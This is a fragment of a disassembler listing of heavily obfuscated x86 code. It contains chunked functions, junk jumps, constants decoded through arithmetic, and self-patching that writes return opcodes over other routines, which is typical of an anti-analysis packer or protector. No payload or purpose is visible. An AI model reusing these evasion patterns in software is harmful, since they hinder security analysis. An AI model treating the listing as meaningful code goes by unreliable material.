; FUNCTION CHUNK AT 0044CB02 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push ecx
mov ecx, edx
xchg ecx, [esp+0]
call sub_45341C
mov eax, 83ED7AACh
push ecx
jmp loc_44CB02
sub_4450AC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F943
loc_4450C6: ; CODE XREF: sub_44F943:loc_452DD8j
popf
call sub_450184
; END OF FUNCTION CHUNK FOR sub_44F943
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4450CC: ; CODE XREF: sub_4459EE+15347j
jmp loc_4595B1
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_4450D1: ; CODE XREF: ut7h7i2x:loc_44960Cj
; sub_45742F-D4B7j
jmp loc_4518BE
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_4450D6: ; CODE XREF: sub_4406F1:loc_43F253j
jmp loc_4456E6
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_4450DB: ; CODE XREF: sub_4408C2-2396j
jmp loc_442FAB
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
push ecx
jmp sub_44865D
; ---------------------------------------------------------------------------
loc_4450E6: ; DATA XREF: sub_45A027o
call sub_4450F6
jmp ds:off_41D204
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_4450F1: ; CODE XREF: sub_442B3B-7BF6j
jmp loc_454253
; END OF FUNCTION CHUNK FOR sub_442B3B
; =============== S U B R O U T I N E =======================================
sub_4450F6 proc near ; CODE XREF: ut7h7i2x:loc_4450E6p
; sub_443FB7:loc_44D1C4j ...
xchg edi, [esp+0]
mov edx, edi
pop edi
push offset sub_455AD6
jmp nullsub_500
sub_4450F6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_445106: ; CODE XREF: sub_443BC5+165F9j
jnp loc_4593C1
loc_44510C: ; CODE XREF: sub_43DE22:loc_45A1A2j
add ebx, 24041477h
loc_445112: ; CODE XREF: ut7h7i2x:loc_454C0Fj
mov [ebx], eax
pop ebx
jmp loc_4531B2
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
loc_44511A: ; CODE XREF: ut7h7i2x:loc_451E30j
push offset sub_43AC9C
jmp loc_4458C1
; ---------------------------------------------------------------------------
sbb esi, 3A8C71C9h
jmp sub_439B38
; ---------------------------------------------------------------------------
loc_44512F: ; DATA XREF: sub_44865D-6C24o
push 687E165Ah
pop ecx
sub ecx, 0D060D4F5h
rol ecx, 1Ah
add ecx, 69E3DACAh
call sub_44A7C6
; START OF FUNCTION CHUNK FOR sub_45983B
loc_445149: ; CODE XREF: sub_45983B+Ej
jmp loc_44DE0C
; END OF FUNCTION CHUNK FOR sub_45983B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_44514E: ; CODE XREF: sub_444273+8283j
jmp loc_45202A
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
loc_445153: ; CODE XREF: ut7h7i2x:0043D20Cj
jmp loc_4438CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_445158: ; CODE XREF: sub_43C0DA+18136j
jo loc_449BFD
loc_44515E: ; CODE XREF: sub_43C0DA:loc_44EA78j
call sub_453D8B
call sub_44E2E0
; END OF FUNCTION CHUNK FOR sub_43C0DA
; START OF FUNCTION CHUNK FOR sub_439788
loc_445168: ; CODE XREF: sub_439788+7551j
jmp loc_44CD9E
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
loc_44516D: ; CODE XREF: ut7h7i2x:0044010Dj
jmp loc_44E102
; ---------------------------------------------------------------------------
loc_445172: ; DATA XREF: sub_452CBB-5E9Co
call sub_454196
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_445178: ; CODE XREF: sub_44BDF1+4D7Bj
jmp loc_459320
; END OF FUNCTION CHUNK FOR sub_44BDF1
; ---------------------------------------------------------------------------
loc_44517D: ; CODE XREF: ut7h7i2x:004406DBj
push ebx
mov ebx, edx
xchg ebx, [esp]
jmp loc_446877
; =============== S U B R O U T I N E =======================================
sub_445188 proc near ; CODE XREF: sub_442E76-1609p
; ut7h7i2x:00456270j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00441358 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00444336 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445888 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004464CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004479EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449638 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D910 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D989 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE6E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E81D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004524C9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004533D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004580F3 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045A8A1 SIZE 0000000D BYTES
xchg ecx, [esp-4+arg_0]
pop ecx
add edx, 0DD04D532h
mov edx, [edx]
imul byte ptr [edx]
jmp loc_449638
sub_445188 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_44519B: ; CODE XREF: sub_445AD1:loc_45053Aj
push 0BE6DC282h
pop edi
rol edi, 0Eh
xor edi, 4D02E836h
add edi, ecx
add edi, 0C25DB90Bh
mov [edi], eax
jmp loc_45A6A0
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
loc_4451B9: ; CODE XREF: ut7h7i2x:00452DDFj
jbe loc_44D885
or ebp, 94E156B5h
; START OF FUNCTION CHUNK FOR sub_44F943
loc_4451C5: ; CODE XREF: sub_44F943:loc_452DD2j
xor ebx, 0CA7D5721h
call sub_440BA2
; END OF FUNCTION CHUNK FOR sub_44F943
; START OF FUNCTION CHUNK FOR sub_454A2B
loc_4451D0: ; CODE XREF: sub_454A2B+14F2j
jmp loc_44EB22
; END OF FUNCTION CHUNK FOR sub_454A2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4487B0
loc_4451D5: ; CODE XREF: sub_4487B0:loc_44E560j
add eax, 2463CA62h
xchg eax, [esp+4+var_4]
jmp loc_43C0BC
; END OF FUNCTION CHUNK FOR sub_4487B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D43D
loc_4451E3: ; CODE XREF: sub_44D43D+C66Fj
mov ebp, edx
xchg ebp, [esp+8+var_8]
call sub_44B5CF
mov eax, 0D53D974Bh
call sub_43AA94
push esi
jmp loc_44F404
; END OF FUNCTION CHUNK FOR sub_44D43D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_4451FD: ; CODE XREF: sub_4464B7:loc_4464BFj
jnz loc_43DBDE
jmp loc_457EB6
; END OF FUNCTION CHUNK FOR sub_4464B7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_445209: ; CODE XREF: sub_4445DC-82F0j
; sub_446C63+13j
jmp loc_45A2A9
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
loc_44520E: ; DATA XREF: sub_452361+7o
mov eax, [esp]
push edx
call sub_4508DB
mov eax, 0EF9F7D01h
call sub_43AA94
mov ds:off_41D06C, eax
lea eax, sub_452361
mov byte ptr [eax], 0C3h
jmp loc_450ACC
; =============== S U B R O U T I N E =======================================
sub_445235 proc near ; CODE XREF: sub_44DD56-1449j
; sub_45ADF0:loc_4590A1p
; FUNCTION CHUNK AT 00441EB3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441EBE SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044C44B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452786 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004538D3 SIZE 00000009 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_441EBE
jmp loc_452786
sub_445235 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44524A: ; CODE XREF: sub_43DBEC:loc_45545Cj
mov eax, [eax]
or eax, eax
jnz loc_45A496
jmp loc_43B063
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443FC3
loc_445259: ; CODE XREF: sub_443FC3+4E10j
shl ebx, 1Ah
adc edx, 17862A87h
jmp loc_4484C1
; END OF FUNCTION CHUNK FOR sub_443FC3
; =============== S U B R O U T I N E =======================================
sub_445267 proc near ; CODE XREF: sub_40D20A+11Dp
; sub_445267+5j
; DATA XREF: ...
call sub_445277
jmp ds:off_41D114
sub_445267 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B6C
loc_445272: ; CODE XREF: sub_454B6C+5j
jmp loc_44E5A0
; END OF FUNCTION CHUNK FOR sub_454B6C
; =============== S U B R O U T I N E =======================================
sub_445277 proc near ; CODE XREF: sub_445267p
; ut7h7i2x:004459ADj ...
push offset loc_443911
jmp nullsub_57
sub_445277 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_445281: ; CODE XREF: sub_439BF8:loc_43BBC5j
push esi
mov [eax], ecx
pushf
cdq
loc_445286: ; CODE XREF: ut7h7i2x:00453F2Dj
xor edi, 2B9DB196h
jmp loc_4597D6
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
push ecx
push 0B4405F71h
pop ecx
rol ecx, 11h
add ecx, 41610986h
push offset sub_45A30D
jmp locret_451D8D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_4452AB: ; CODE XREF: sub_446320:loc_455DFAj
or edi, 0B3DF7CB8h
jmp loc_447B07
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF2B
loc_4452B6: ; CODE XREF: sub_43FF2B:loc_443661j
add ebx, 0E44D2BDAh
xchg ebx, [esp+4+var_4]
jmp sub_450EFA
; END OF FUNCTION CHUNK FOR sub_43FF2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D797
loc_4452C4: ; CODE XREF: sub_43D797:loc_43D79Cj
jnz loc_44D4D8
jp loc_459B46
and ecx, ebp
jmp loc_44D4CE
; END OF FUNCTION CHUNK FOR sub_43D797
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_4452D7: ; CODE XREF: sub_447CBE:loc_449345j
pop edx
or edx, 375FD480h
rol edx, 2
add edx, 552A43A1h
sub eax, edx
jmp loc_45A542
; END OF FUNCTION CHUNK FOR sub_447CBE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_241. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_4452EF: ; CODE XREF: ut7h7i2x:0043E8BAj
retn
; ---------------------------------------------------------------------------
loc_4452F0: ; CODE XREF: ut7h7i2x:0043BD4Ej
jmp nullsub_514
; ---------------------------------------------------------------------------
xchg ebp, [ebx]
jmp sub_43CFB6
; ---------------------------------------------------------------------------
loc_4452FC: ; DATA XREF: sub_4529E0-E97Bo
push 7DA27A90h
pop esi
or esi, 7EC78B4h
add esi, 8056E4E4h
xchg esi, [esp]
jmp sub_43BA59
; ---------------------------------------------------------------------------
loc_445316: ; CODE XREF: ut7h7i2x:0043A3D7j
cmp ebx, ecx
jmp loc_4564BD
; ---------------------------------------------------------------------------
loc_44531D: ; DATA XREF: ut7h7i2x:0043EEE4o
call nullsub_123
jmp ds:dword_41D0EC
; ---------------------------------------------------------------------------
loc_445328: ; CODE XREF: ut7h7i2x:004403EAj
; ut7h7i2x:00457B6Cj
jmp sub_45A907
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44532D: ; CODE XREF: sub_44CE09+2286j
jmp loc_44BF8A
; END OF FUNCTION CHUNK FOR sub_44CE09
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sbb al, 24h
mov edx, ebx
pop ebx
jno loc_44B4F9
mov eax, [esp]
jmp loc_450E04
; =============== S U B R O U T I N E =======================================
sub_445346 proc near ; CODE XREF: sub_44EE57:loc_4527C2p
; ut7h7i2x:004599D7j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00444DE4 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
xchg ebx, [esp-4+arg_0]
jmp loc_444DE4
sub_445346 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or eax, edx
jmp sub_451C98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_445359: ; CODE XREF: sub_452B14:loc_440ECEj
jnz sub_44AA33
jmp loc_43A7A0
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
mov ds:dword_41D19C, eax
lea eax, nullsub_541
mov byte ptr [eax], 0C3h
jmp loc_442CCC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4490E0
loc_445378: ; CODE XREF: sub_4490E0j
mov eax, [esp+0]
push edx
call sub_449D3B
push 0B2C61101h
jmp loc_4567DB
; END OF FUNCTION CHUNK FOR sub_4490E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_44538B: ; CODE XREF: sub_4456F4-126Cj
pop edx
and edx, 24EA8B65h
or edx, 45F24385h
add edx, 9A5187C1h
loc_44539E: ; CODE XREF: sub_44F9A1:loc_451AEFj
xchg edx, [esp+0]
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
mov edx, 0F2B89A19h
call sub_44ED9F
jmp loc_45A97D
; =============== S U B R O U T I N E =======================================
sub_4453B5 proc near ; CODE XREF: sub_43CA2D:loc_443D17p
; ut7h7i2x:00446AB5j
xchg eax, [esp+0]
pop eax
pop ecx
call sub_44A3F1
loc_4453BF: ; CODE XREF: ut7h7i2x:00443BC0j
jmp sub_43AED9
sub_4453B5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edx, ebx
jo sub_4433C5
jmp sub_44A33F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_4453D1: ; CODE XREF: sub_43D021:loc_449F1Dj
xchg ebp, [esp+0Ch+var_C]
mov edx, ebp
pop ebp
rol edx, 1Ch
jnb loc_44935C
loc_4453E0: ; CODE XREF: sub_452653-17293j
jmp loc_44968C
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
pop eax
jmp loc_44935A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_4453EB: ; CODE XREF: sub_44F738+3j
push edi
mov edi, ecx
xchg edi, [esp+0]
mov esp, ebp
pop ebp
mov eax, ds:dword_446640
or eax, eax
jmp loc_44FDA3
; END OF FUNCTION CHUNK FOR sub_44F738
; =============== S U B R O U T I N E =======================================
sub_445401 proc near ; CODE XREF: ut7h7i2x:0044219Fj
; sub_44D5BE+5A44p
xchg edx, [esp+0]
pop edx
pop esi
retn
sub_445401 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4573BA
loc_445407: ; CODE XREF: sub_4573BA-111Cj
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_4573BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44540C: ; CODE XREF: sub_43DBEC+1CBA8j
rol eax, 6
push eax
retn
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_445411: ; CODE XREF: ut7h7i2x:00447619j
jmp loc_439F2F
; =============== S U B R O U T I N E =======================================
sub_445416 proc near ; CODE XREF: sub_43A556+DF0Ap
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00457E49 SIZE 00000012 BYTES
push eax
jmp loc_457E49
sub_445416 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_44541C: ; CODE XREF: sub_45341C-1615Dj
not ecx
sbb ecx, edi
jmp loc_44AA22
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FF66
loc_445425: ; CODE XREF: sub_44FF66:loc_43D4A6j
xor esi, 0D0DE93E2h
add esi, 0B4C4C2A3h
call sub_44715B
; END OF FUNCTION CHUNK FOR sub_44FF66
; START OF FUNCTION CHUNK FOR sub_444029
loc_445436: ; CODE XREF: sub_444029+A090j
jmp loc_453F7A
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44543B: ; CODE XREF: sub_43EF73:loc_441457j
xor ebx, 5DDBB480h
rol ebx, 1
or ebx, ds:4000FAh
sub ebx, 4681ED88h
add ebx, 90AD79ABh
xchg ebx, [esp+0]
jmp sub_4448AF
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
loc_44545D: ; CODE XREF: ut7h7i2x:0044409Bj
jge loc_43D43C
mov ebp, 72A41632h
push 9775872Ah
adc esi, 0BBDE3F5Fh
test ebx, edi
jmp loc_43D436
; ---------------------------------------------------------------------------
loc_44547A: ; DATA XREF: ut7h7i2x:00452A05o
push esi
push 0F61C9B2Eh
pop esi
rol esi, 0Dh
sub esi, 7FD38C60h
jmp loc_446183
; ---------------------------------------------------------------------------
loc_44548F: ; CODE XREF: ut7h7i2x:00440BD3j
xchg ebp, [esi]
or eax, 0CFC762CEh
jmp loc_43EBBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_44549C: ; CODE XREF: sub_458CBB:loc_451E4Dj
call sub_4454CF
loc_4454A1: ; CODE XREF: sub_456B5E+3A6Fj
jmp loc_446241
; END OF FUNCTION CHUNK FOR sub_458CBB
; ---------------------------------------------------------------------------
loc_4454A6: ; DATA XREF: sub_43C923+1o
push 0B996943Ah
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4454AB: ; CODE XREF: sub_447EB5+1306j
pop ecx
and ecx, 19868E46h
or ecx, 0A3163C0Fh
sub ecx, 0A0956804h
and ecx, 0DBA357CFh
jmp loc_4505B6
; END OF FUNCTION CHUNK FOR sub_447EB5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4446B0
loc_4454CA: ; CODE XREF: sub_4446B0+14j
jmp loc_444AAE
; END OF FUNCTION CHUNK FOR sub_4446B0
; =============== S U B R O U T I N E =======================================
sub_4454CF proc near ; CODE XREF: sub_458CBB:loc_44549Cp
; ut7h7i2x:00446842j
; FUNCTION CHUNK AT 0044C125 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
sub al, 99h
push offset loc_4591B1
jmp loc_44C125
sub_4454CF endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_4454E0: ; CODE XREF: sub_44E2C4-77C9j
jmp loc_439DFD
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_4454E5: ; CODE XREF: sub_449217-F004j
jmp loc_44773F
; END OF FUNCTION CHUNK FOR sub_449217
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4454EA proc near ; CODE XREF: sub_4415EB:loc_45339Bj
; FUNCTION CHUNK AT 0043D4AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045218F SIZE 00000018 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFF7ECh
push 0CAC3D3BCh
jmp loc_43D4AB
sub_4454EA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edx, 0BD91ED44h
push edi
push 5F88C4B8h
pop edi
loc_445509: ; CODE XREF: ut7h7i2x:loc_4561BAj
jmp loc_43E971
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C9F5
loc_44550E: ; CODE XREF: sub_44C9F5+15j
xchg ecx, [esp+4+var_4]
push offset loc_44367F
jmp nullsub_91
; END OF FUNCTION CHUNK FOR sub_44C9F5
; =============== S U B R O U T I N E =======================================
sub_44551B proc near ; CODE XREF: sub_44D26E-7042p
; ut7h7i2x:0044A51Ej
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00444722 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004543DC SIZE 0000000D BYTES
xchg edx, [esp+0]
pop edx
add eax, edi
pop edi
cmp dword ptr [eax], 47424454h
jz loc_456EB1
jmp loc_444722
sub_44551B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_445533: ; CODE XREF: ut7h7i2x:00451C2Aj
xchg ebx, [edx]
jmp loc_43C26D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_339. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44553B: ; CODE XREF: ut7h7i2x:0043AE4Dj
jmp nullsub_541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_445540: ; CODE XREF: sub_43A556+B64Bj
jnz loc_441F49
jmp loc_43D771
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD08
loc_44554B: ; CODE XREF: sub_43CD08:loc_448800j
call sub_44939A
loc_445550: ; CODE XREF: sub_4457F7+Cj
jmp loc_44AF5A
; END OF FUNCTION CHUNK FOR sub_43CD08
; ---------------------------------------------------------------------------
push edx
push 3A8DE31Ch
pop edx
rol edx, 3
add edx, 0DD40CBF5h
sub edx, 12A968EAh
jmp loc_448D5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445CC3
loc_445570: ; CODE XREF: sub_445CC3+Bj
pop esi
mov eax, [esp-4+arg_0]
push edx
push offset sub_458DC5
jmp nullsub_556
; END OF FUNCTION CHUNK FOR sub_445CC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B873
loc_44557F: ; CODE XREF: sub_43B873+2D9Fj
jnz loc_449059
loc_445585: ; CODE XREF: sub_44C273-818Bj
jmp loc_43955F
; END OF FUNCTION CHUNK FOR sub_43B873
; ---------------------------------------------------------------------------
shl edx, 3
jo loc_456573
jmp loc_449053
; ---------------------------------------------------------------------------
loc_445598: ; CODE XREF: ut7h7i2x:loc_44FAA4j
sub esi, 0B3913553h
xchg edi, ebp
jmp loc_43F2AD
; ---------------------------------------------------------------------------
locret_4455A5: ; CODE XREF: ut7h7i2x:00444D1Bj
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_508. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4455A7: ; CODE XREF: ut7h7i2x:00441B1Bj
call sub_44E2C4
test al, al
jz loc_44FD03
jmp loc_44980E
; ---------------------------------------------------------------------------
loc_4455B9: ; CODE XREF: ut7h7i2x:loc_43D06Ej
push edi
mov edi, edx
xchg edi, [esp]
push edi
push 0C46160A1h
jmp loc_4507DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_421. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4455CB: ; CODE XREF: ut7h7i2x:00454F05j
jmp loc_44570F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_215. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4455D1: ; CODE XREF: ut7h7i2x:0043C9C4j
jmp loc_43FB9A
; ---------------------------------------------------------------------------
xor eax, 589EF3F8h
ror edx, 1Fh
jmp sub_443FC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455DCD
loc_4455E4: ; CODE XREF: sub_455DCD:loc_4438E4j
; sub_455DCD-99B8j
call sub_44C068
test eax, eax
loc_4455EB: ; CODE XREF: ut7h7i2x:loc_43F699j
; ut7h7i2x:00452BBDj
setnz byte ptr [ebp-1]
jmp loc_43A442
; END OF FUNCTION CHUNK FOR sub_455DCD
; =============== S U B R O U T I N E =======================================
sub_4455F4 proc near ; CODE XREF: sub_452D56j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043E54F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00440620 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044322D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044448D SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00444657 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445793 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004487DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449929 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AE24 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E8FB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451573 SIZE 00000005 BYTES
push ebx
mov ebx, ebp
xchg ebx, [esp+0]
loc_4455FA: ; CODE XREF: ut7h7i2x:loc_455BF3j
jmp loc_44AE24
sub_4455F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4473F5
loc_4455FF: ; CODE XREF: sub_4473F5+E7F9j
push 0B41D2451h
pop ecx
or ecx, ds:4000FBh
and ecx, 864DD25Dh
rol ecx, 0Fh
jmp loc_445C46
; END OF FUNCTION CHUNK FOR sub_4473F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A76A
loc_445619: ; CODE XREF: sub_43A76A+18ABFj
jz loc_44E823
jmp loc_440560
; END OF FUNCTION CHUNK FOR sub_43A76A
; ---------------------------------------------------------------------------
loc_445624: ; CODE XREF: ut7h7i2x:004480CEj
pop eax
and eax, 4FD635D0h
add eax, 0B13DEEEFh
xchg eax, [esp]
push edi
mov edi, eax
jmp loc_4469D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_44563C: ; CODE XREF: sub_43FCEE+21FEj
adc ebp, esi
add ebp, edx
push 4A67B14Ah
jmp loc_453A6A
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44564A: ; CODE XREF: sub_447CBE+7118j
jge loc_44195B
loc_445650: ; CODE XREF: ut7h7i2x:004434A9j
jmp loc_44B4F1
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
jg loc_454293
adc ecx, 71BCD54Dh
mov ebp, ecx
jb loc_44DE12
jmp loc_44195B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44101A
loc_44566E: ; CODE XREF: sub_44101A+1089Fj
mov al, 1
shl al, cl
mov edx, [ebp-14h]
shr edx, 3
jmp loc_446FBC
; END OF FUNCTION CHUNK FOR sub_44101A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_44567D: ; CODE XREF: sub_44E2E0-828Ej
sub ebx, 49C12F10h
loc_445683: ; CODE XREF: sub_446599:loc_447424j
pop large dword ptr fs:0
add esp, 4
push 2B3C5CCh
pop eax
rol eax, 0Eh
xor eax, 0F17300FDh
push edx
jmp loc_44C5B5
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
loc_4456A2: ; CODE XREF: ut7h7i2x:004470C5j
jnz loc_439BAB
push ebp
jmp loc_446194
; ---------------------------------------------------------------------------
rol edi, 0Dh
jmp sub_43FE13
; =============== S U B R O U T I N E =======================================
sub_4456B6 proc near ; CODE XREF: ut7h7i2x:00452D7Dj
; sub_43CFB6+19B3Ap
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0044F4A7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045078A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451DC5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045399E SIZE 00000010 BYTES
xchg eax, [esp+0]
pop eax
adc edx, [esp-4+arg_4]
add esp, 8
mov [ebp-4], eax
jmp loc_45078A
sub_4456B6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4456C9 proc near ; CODE XREF: sub_43CFB6+4p
; sub_4544E6:loc_43FDF9p ...
; FUNCTION CHUNK AT 0045106A SIZE 00000014 BYTES
call sub_4561CA
loc_4456CE: ; CODE XREF: sub_445A8C+778Fj
xor ebx, 0F7E67FF7h
xchg ebx, [esp+0]
call sub_43D9A8
loc_4456DC: ; CODE XREF: sub_451759+17j
jmp loc_45106A
